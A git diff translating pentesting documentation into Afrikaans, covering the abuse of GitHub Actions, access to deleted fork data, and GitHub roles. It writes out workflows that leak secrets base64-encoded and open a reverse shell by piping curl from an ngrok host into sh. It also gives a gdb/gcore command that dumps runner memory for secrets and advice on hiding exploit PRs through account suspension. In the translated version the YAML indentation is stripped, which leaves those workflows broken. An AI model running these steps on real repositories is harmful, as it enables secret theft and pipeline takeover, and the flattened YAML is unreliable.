+### **GITHUB_ENV Skrip Injekie** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
 
-From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
+Volgens die dokumentasie: Jy kan 'n **omgewing veranderlike beskikbaar maak vir enige daaropvolgende stappe** in 'n werksvloei taak deur die omgewing veranderlike te definieer of op te dateer en dit na die **`GITHUB_ENV`** omgewing lêer te skryf.
 
-If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
+As 'n aanvaller **enige waarde** binne hierdie **env** veranderlike kan **injekteer**, kan hy env veranderlikes injekteer wat kode in daaropvolgende stappe kan uitvoer soos **LD_PRELOAD** of **NODE_OPTIONS**.
 
-For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
+Byvoorbeeld ([**hierdie**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) en [**hierdie**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), stel jou voor 'n werksvloei wat 'n geupload artefak vertrou om sy inhoud binne die **`GITHUB_ENV`** env veranderlike te stoor. 'n Aanvaller kan iets soos dit oplaai om dit te kompromitteer:
 
 <figure><img src="../../../images/image (261).png" alt=""><figcaption></figcaption></figure>
 
-### Vulnerable Third Party Github Actions
+### Kwesbare Derdeparty Github Aksies
 
 #### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
 
-As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
+Soos genoem in [**hierdie blogpos**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), laat hierdie Github Aksie toe om toegang tot artefakte van verskillende werksvloei en selfs repositories te verkry.
 
-The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
-
-Example of vulnerable workflow:
+Die probleem is dat as die **`path`** parameter nie gestel is nie, die artefak in die huidige gids uitgepak word en dit kan lêers oorskryf wat later in die werksvloei gebruik of selfs uitgevoer kan word. Daarom, as die Artefak kwesbaar is, kan 'n aanvaller dit misbruik om ander werksvloei wat die Artefak vertrou, te kompromitteer.
 
+Voorbeeld van kwesbare werksvloei:
 ```yaml
 on:
-  workflow_run:
-    workflows: ["some workflow"]
-    types:
-      - completed
+workflow_run:
+workflows: ["some workflow"]
+types:
+- completed
 
 jobs:
-  success:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/checkout@v2
-      - name: download artifact
-        uses: dawidd6/action-download-artifact
-        with:
-          workflow: ${{ github.event.workflow_run.workflow_id }}
-          name: artifact
-      - run: python ./script.py
-        with:
-          name: artifact
-          path: ./script.py
+success:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@v2
+- name: download artifact
+uses: dawidd6/action-download-artifact
+with:
+workflow: ${{ github.event.workflow_run.workflow_id }}
+name: artifact
+- run: python ./script.py
+with:
+name: artifact
+path: ./script.py
 ```
-
-This could be attacked with this workflow:
-
+Dit kan aangeval word met hierdie werksvloei:
 ```yaml
 name: "some workflow"
 on: pull_request
 
 jobs:
-    upload:
-        runs-on: ubuntu-latest
-        steps:
-            - run: echo "print('exploited')" > ./script.py
-            - uses actions/upload-artifact@v2
-              with:
-                name: artifact
-                path: ./script.py
+upload:
+runs-on: ubuntu-latest
+steps:
+- run: echo "print('exploited')" > ./script.py
+- uses actions/upload-artifact@v2
+with:
+name: artifact
+path: ./script.py
 ```
-
 ---
 
-## Other External Access
+## Ander Eksterne Toegang
 
-### Deleted Namespace Repo Hijacking
+### Verwyderde Namespace Repo Hijacking
 
-If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
+As 'n rekening sy naam verander, kan 'n ander gebruiker 'n rekening met daardie naam registreer na 'n tyd. As 'n repository **minder as 100 sterre gehad het voor die naamsverandering**, sal Github die nuwe geregistreerde gebruiker met dieselfde naam toelaat om 'n **repository met dieselfde naam** as die een wat verwyder is, te skep.
 
 > [!CAUTION]
-> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+> So as 'n aksie 'n repo van 'n nie-bestaande rekening gebruik, is dit steeds moontlik dat 'n aanvaller daardie rekening kan skep en die aksie kan kompromitteer.
 
-If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
+As ander repositories **afhangklikhede van hierdie gebruiker repos** gebruik, sal 'n aanvaller in staat wees om hulle te hijack. Hier is 'n meer volledige verduideliking: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
 
 ---
 
 ## Repo Pivoting
 
 > [!NOTE]
-> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
+> In hierdie afdeling sal ons praat oor tegnieke wat sou toelaat om te **pivot van een repo na 'n ander** mits ons 'n soort toegang op die eerste een het (kyk na die vorige afdeling).
 
 ### Cache Poisoning
 
-A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+'n Cache word tussen **workflow-uitvoerings in dieselfde tak** gehandhaaf. Dit beteken dat as 'n aanvaller **kompromitteer** 'n **pakket** wat dan in die cache gestoor word en **afgelaai** en uitgevoer word deur 'n **meer bevoorregte** workflow, hy ook daardie workflow sal kan **kompromitteer**.
 
 {{#ref}}
 gh-actions-cache-poisoning.md
@@ -386,7 +368,7 @@ gh-actions-cache-poisoning.md
 
 ### Artifact Poisoning
 
-Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
+Workflows kan **artifacts van ander workflows en selfs repos** gebruik, as 'n aanvaller daarin slaag om die Github Action wat 'n **artifact** oplaai wat later deur 'n ander workflow gebruik word, te **kompromitteer**, kan hy die **ander workflows** ook **kompromitteer**:
 
 {{#ref}}
 gh-actions-artifact-poisoning.md
@@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md
 
 ---
 
-## Post Exploitation from an Action
+## Post Exploitation van 'n Aksie
 
-### Accessing AWS and GCP via OIDC
+### Toegang tot AWS en GCP via OIDC
 
-Check the following pages:
+Kyk na die volgende bladsye:
 
 {{#ref}}
 ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -408,170 +390,160 @@ Check the following pages:
 ../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
 {{#endref}}
 
-### Accessing secrets <a href="#accessing-secrets" id="accessing-secrets"></a>
+### Toegang tot geheime <a href="#accessing-secrets" id="accessing-secrets"></a>
 
-If you are injecting content into a script it's interesting to know how you can access secrets:
+As jy inhoud in 'n skrif inspuit, is dit interessant om te weet hoe jy toegang tot geheime kan kry:
 
-- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+- As die geheim of token op 'n **omgewing veranderlike** gestel is, kan dit direk deur die omgewing met **`printenv`** aangespreek word.
 
 <details>
 
-<summary>List secrets in Github Action output</summary>
-
+<summary>Lys geheime in Github Action-uitvoer</summary>
 ```yaml
 name: list_env
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - '**'
-  push: # Run it when a push is made to a branch
-    branches:
-      - '**'
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- '**'
+push: # Run it when a push is made to a branch
+branches:
+- '**'
 jobs:
-  List_env:
-    runs-on: ubuntu-latest
-    steps:
-      - name: List Env
-        # Need to base64 encode or github will change the secret value for "***"
-        run: sh -c 'env | grep "secret_" | base64 -w0'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
 
-                    secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
-
 </details>
 
 <details>
 
-<summary>Get reverse shell with secrets</summary>
-
+<summary>Kry omgekeerde skulp met geheime</summary>
 ```yaml
 name: revshell
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - "**"
-  push: # Run it when a push is made to a branch
-    branches:
-      - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
 jobs:
-  create_pull_request:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Get Rev Shell
-        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
-          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
-
 </details>
 
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
-  - ```bash
-    cat /home/runner/work/_temp/*
-    ```
-- For a JavaScript actions the secrets and sent through environment variables
-  - ```bash
-    ps axe | grep node
-    ```
-- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+- As die geheim **direk in 'n uitdrukking** gebruik word, word die gegenereerde shell-skrip **op-disk** gestoor en is dit toeganklik.
+- ```bash
+cat /home/runner/work/_temp/*
+```
+- Vir 'n JavaScript aksies word die geheime deur omgewing veranderlikes gestuur.
+- ```bash
+ps axe | grep node
+```
+- Vir 'n **aangepaste aksie** kan die risiko verskil, afhangende van hoe 'n program die geheim wat dit van die **argument** verkry het, gebruik:
 
-  ```yaml
-  uses: fakeaction/publish@v3
-  with:
-    key: ${{ secrets.PUBLISH_KEY }}
-  ```
+```yaml
+uses: fakeaction/publish@v3
+with:
+key: ${{ secrets.PUBLISH_KEY }}
+```
 
-### Abusing Self-hosted runners
+### Misbruik van Self-gehoste lopers
 
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
+Die manier om te vind watter **Github Actions in nie-github infrastruktuur** uitgevoer word, is om te soek na **`runs-on: self-hosted`** in die Github Action konfigurasie yaml.
 
-**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
-
-In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
+**Self-gehoste** lopers mag toegang hê tot **ekstra sensitiewe inligting**, na ander **netwerkstelsels** (kwetsbare eindpunte in die netwerk? metadata diens?) of, selfs al is dit geïsoleer en vernietig, kan **meer as een aksie gelyktydig uitgevoer word** en die kwaadwillige een kan die **geheime** van die ander steel.
 
+In self-gehoste lopers is dit ook moontlik om die **geheime van die \_Runner.Listener**\_\*\* proses\*\* te verkry wat al die geheime van die werksvloei op enige stap sal bevat deur sy geheue te dump:
 ```bash
 sudo apt-get install -y gdb
 sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
 ```
+Kontroleer [**hierdie pos vir meer inligting**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
 
-Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+### Github Docker Beeld Registrasie
 
-### Github Docker Images Registry
-
-It's possible to make Github actions that will **build and store a Docker image inside Github**.\
-An example can be find in the following expandable:
+Dit is moontlik om Github aksies te maak wat **'n Docker beeld binne Github bou en stoor**.\
+'n Voorbeeld kan gevind word in die volgende uitbreidbare:
 
 <details>
 
-<summary>Github Action Build &#x26; Push Docker Image</summary>
-
+<summary>Github Aksie Bou &#x26; Stoot Docker Beeld</summary>
 ```yaml
 [...]
 
 - name: Set up Docker Buildx
-  uses: docker/setup-buildx-action@v1
+uses: docker/setup-buildx-action@v1
 
 - name: Login to GitHub Container Registry
-  uses: docker/login-action@v1
-  with:
-    registry: ghcr.io
-    username: ${{ github.repository_owner }}
-    password: ${{ secrets.ACTIONS_TOKEN }}
+uses: docker/login-action@v1
+with:
+registry: ghcr.io
+username: ${{ github.repository_owner }}
+password: ${{ secrets.ACTIONS_TOKEN }}
 
 - name: Add Github Token to Dockerfile to be able to download code
-  run: |
-    sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
+run: |
+sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
 
 - name: Build and push
-  uses: docker/build-push-action@v2
-    with:
-      context: .
-      push: true
-      tags: |
-        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
-        ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
+uses: docker/build-push-action@v2
+with:
+context: .
+push: true
+tags: |
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
 
 [...]
 ```
-
 </details>
 
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
-
-A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
+Soos jy in die vorige kode kon sien, is die Github registrasie gehos in **`ghcr.io`**.
 
+'n Gebruiker met leesregte oor die repo sal dan in staat wees om die Docker Image af te laai met 'n persoonlike toegangsteken:
 ```bash
 echo $gh_token | docker login ghcr.io -u <username> --password-stdin
 docker pull ghcr.io/<org-name>/<repo_name>:<tag>
 ```
-
 Then, the user could search for **leaked secrets in the Docker image layers:**
 
 {{#ref}}
 https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
 {{#endref}}
 
-### Sensitive info in Github Actions logs
+### Sensitiewe inligting in Github Actions logs
 
-Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
+Selfs al probeer **Github** om **geheime waardes** in die aksies logs te **detecteer** en **te vermy om** hulle te wys, sal **ander sensitiewe data** wat in die uitvoering van die aksie gegenereer kon gewees het, nie versteek wees nie. Byvoorbeeld, 'n JWT wat met 'n geheime waarde onderteken is, sal nie versteek wees nie tensy dit [spesifiek gekonfigureer](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret) is.
 
-## Covering your Tracks
+## Bedek jou Spore
 
-(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
+(Techniek van [**hier**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Eerstens, enige PR wat ingedien word, is duidelik sigbaar vir die publiek in Github en vir die teiken GitHub rekening. In GitHub kan ons **nie 'n PR van die internet verwyder** nie, maar daar is 'n draai. Vir GitHub rekeninge wat **gesuspend** is deur Github, word al hul **PRs outomaties verwyder** en van die internet verwyder. So om jou aktiwiteit te verberg, moet jy jou **GitHub rekening gesuspend kry of jou rekening geflag** kry. Dit sal **al jou aktiwiteite** op GitHub van die internet verberg (basies al jou eksploit PR verwyder)
 
-An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
+'n Organisasie in GitHub is baie proaktief in die verslagdoening van rekeninge aan GitHub. Al wat jy moet doen is om “n paar goed” in 'n Issue te deel en hulle sal seker maak jou rekening word binne 12 uur gesuspend :p en daar het jy, jou eksploit onsigbaar gemaak op github.
 
 > [!WARNING]
-> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+> Die enigste manier vir 'n organisasie om uit te vind dat hulle geteiken is, is om GitHub logs van SIEM te kontroleer, aangesien die PR van die GitHub UI verwyder sal word.
 
-## Tools
+## Gereedskap
 
-The following tools are useful to find Github Action workflows and even find vulnerable ones:
+Die volgende gereedskap is nuttig om Github Action workflows te vind en selfs kwesbare te vind:
 
 - [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
 - [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
@@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul
 - [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index ae156de2d..108ec544e 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,6 +1 @@
-# Gh Actions - Artifact Poisoning
-
-
-
-
-
+# Gh Actions - Artefakbesmetting
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
index 024aa5ff8..f77c0d2d3 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,6 +1 @@
 # GH Actions - Cache Poisoning
-
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
index 3cd632bd0..9cef507bc 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,6 +1 @@
 # Gh Actions - Context Script Injections
-
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
index f19fa699e..83ab208ec 100644
--- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -1,60 +1,56 @@
-# Accessible Deleted Data in Github
+# Toeganklike Verwyderde Gegewens in Github
 
 {{#include ../../banners/hacktricks-training.md}}
 
-This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+Hierdie maniere om toegang te verkry tot data van Github wat veronderstel is om verwyder te wees, is [**in hierdie blogpos gerapporteer**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
 
-## Accessing Deleted Fork Data
+## Toegang tot Verwyderde Fork Gegewens
 
-1. You fork a public repository
-2. You commit code to your fork
-3. You delete your fork
+1. Jy fork 'n openbare repository
+2. Jy commit kode na jou fork
+3. Jy verwyder jou fork
 
 > [!CAUTION]
-> The data commited in the deleted fork is still accessible.
+> Die data wat in die verwyderde fork gecommit is, is steeds toeganklik.
 
-## Accessing Deleted Repo Data
+## Toegang tot Verwyderde Repo Gegewens
 
-1. You have a public repo on GitHub.
-2. A user forks your repo.
-3. You commit data after they fork it (and they never sync their fork with your updates).
-4. You delete the entire repo.
+1. Jy het 'n openbare repo op GitHub.
+2. 'n Gebruiker fork jou repo.
+3. Jy commit data nadat hulle dit gefork het (en hulle sink nooit hul fork met jou opdaterings nie).
+4. Jy verwyder die hele repo.
 
 > [!CAUTION]
-> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+> Selfs al het jy jou repo verwyder, is al die veranderinge wat aan dit gemaak is steeds toeganklik deur die forks.
 
-## Accessing Private Repo Data
+## Toegang tot Privaat Repo Gegewens
 
-1. You create a private repo that will eventually be made public.
-2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
-3. You make your “upstream” repository public and keep your fork private.
+1. Jy skep 'n privaat repo wat uiteindelik openbaar gemaak sal word.
+2. Jy skep 'n privaat, interne weergawe van daardie repo (deur te fork) en commit addisionele kode vir funksies wat jy nie openbaar gaan maak nie.
+3. Jy maak jou “upstream” repository openbaar en hou jou fork privaat.
 
 > [!CAUTION]
-> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+> Dit is moontlik om al die data wat na die interne fork gepush is, te bekom in die tyd tussen die interne fork geskep is en die openbare weergawe openbaar gemaak is.
 
-## How to discover commits from deleted/hidden forks
+## Hoe om commits van verwyderde/verborgene forks te ontdek
 
-The same blog post propose 2 options:
+Die dieselfde blogpos stel 2 opsies voor:
 
-### Directly accessing the commit
+### Direk toegang tot die commit
 
-If the commit ID (sha-1) value is known it's possible to access it in `https://github.com/<user/org>/<repo>/commit/<commit_hash>`
+As die commit ID (sha-1) waarde bekend is, is dit moontlik om dit te bekom in `https://github.com/<user/org>/<repo>/commit/<commit_hash>`
 
-### Brute-forcing short SHA-1 values
+### Brute-forcing kort SHA-1 waardes
 
-It's the same to access both of these:
+Dit is dieselfde om toegang tot albei van hierdie te verkry:
 
 - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
 - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
 
-And the latest one use a short sha-1 that is bruteforceable.
+En die laaste een gebruik 'n kort sha-1 wat bruteforceable is.
 
-## References
+## Verwysings
 
 - [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
index ae1365a0f..bdf943045 100644
--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -1,202 +1,196 @@
-# Basic Github Information
+# Basiese Github Inligting
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Structure
+## Basiese Struktuur
 
-The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
+Die basiese github omgewingstruktuur van 'n groot **maatskappy** is om 'n **onderneming** te besit wat **verskeie organisasies** besit en elkeen van hulle kan **verskeie repositories** en **verskeie span** bevat. Klein maatskappye mag net **een organisasie en geen ondernemings** besit nie.
 
-From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
+Vanuit 'n gebruiker se perspektief kan 'n **gebruiker** 'n **lid** van **verskillende ondernemings en organisasies** wees. Binne hulle kan die gebruiker **verskillende onderneming, organisasie en repository rolle** hê.
 
-Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
+Boonop kan 'n gebruiker **deel wees van verskillende spanne** met verskillende onderneming, organisasie of repository rolle.
 
-And finally **repositories may have special protection mechanisms**.
+En uiteindelik kan **repositories spesiale beskermingsmeganismes** hê.
 
 ## Privileges
 
-### Enterprise Roles
+### Onderneming Rolle
 
-- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **Ondernemingseienaar**: Mense met hierdie rol kan **administrateurs bestuur, organisasies binne die onderneming bestuur, onderneminginstellings bestuur, beleid afdwing oor organisasies**. Hulle **kan egter nie toegang tot organisasie-instellings of inhoud** verkry tensy hulle 'n organisasie-eienaar gemaak word of direkte toegang tot 'n organisasie-besit repository gegee word nie.
+- **Ondernemingslede**: Lede van organisasies wat deur jou onderneming besit word, is ook **outomaties lede van die onderneming**.
 
-### Organization Roles
+### Organisasie Rolle
 
-In an organisation users can have different roles:
+In 'n organisasie kan gebruikers verskillende rolle hê:
 
-- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
-  - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
-- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **Organisasie-eienaars**: Organisasie-eienaars het **volledige administratiewe toegang tot jou organisasie**. Hierdie rol moet beperk word, maar nie tot minder as twee mense in jou organisasie nie.
+- **Organisasie lede**: Die **standaard**, nie-administratiewe rol vir **mense in 'n organisasie** is die organisasielid. Standaard het organisasielede **'n aantal toestemmings**.
+- **Faktuurbestuurders**: Faktuurbestuurders is gebruikers wat **die faktuurinstellings vir jou organisasie kan bestuur**, soos betalingsinligting.
+- **Sekuriteitsbestuurders**: Dit is 'n rol wat organisasie-eienaars aan enige span in 'n organisasie kan toewys. Wanneer toegepas, gee dit elke lid van die span toestemming om **sekuriteitswaarskuwings en instellings oor jou organisasie te bestuur, sowel as leestoestemmings vir alle repositories** in die organisasie.
+- As jou organisasie 'n sekuriteitspan het, kan jy die sekuriteitsbestuurderrol gebruik om lede van die span die minste toegang te gee wat hulle nodig het tot die organisasie.
+- **Github App bestuurders**: Om addisionele gebruikers toe te laat om **GitHub Apps wat deur 'n organisasie besit word te bestuur**, kan 'n eienaar hulle GitHub App bestuurder toestemmings gee.
+- **Buite samewerkers**: 'n Buite samewerker is 'n persoon wat **toegang het tot een of meer organisasie repositories maar nie eksplisiet 'n lid** van die organisasie is nie.
 
-You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
+Jy kan **die toestemmings** van hierdie rolle in hierdie tabel vergelyk: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
 
-### Members Privileges
+### Lede Privileges
 
-In _https://github.com/organizations/\<org_name>/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+In _https://github.com/organizations/\<org_name>/settings/member_privileges_ kan jy die **toestemmings wat gebruikers sal hê net omdat hulle deel van die organisasie is** sien.
 
-The settings here configured will indicate the following permissions of members of the organisation:
+Die instellings hier geconfigureer sal die volgende toestemmings van lede van die organisasie aandui:
 
-- Be admin, writer, reader or no permission over all the organisation repos.
-- If members can create private, internal or public repositories.
-- If forking of repositories is possible
-- If it's possible to invite outside collaborators
-- If public or private sites can be published
-- The permissions admins has over the repositories
-- If members can create new teams
+- Wees admin, skrywer, leser of geen toestemming oor al die organisasie repos.
+- Of lede privaat, interne of openbare repositories kan skep.
+- Of fork van repositories moontlik is.
+- Of dit moontlik is om buite samewerkers uit te nooi.
+- Of openbare of private webwerwe gepubliseer kan word.
+- Die toestemmings wat administrateurs oor die repositories het.
+- Of lede nuwe spanne kan skep.
 
-### Repository Roles
+### Repository Rolle
 
-By default repository roles are created:
+Standaard word repository rolle geskep:
 
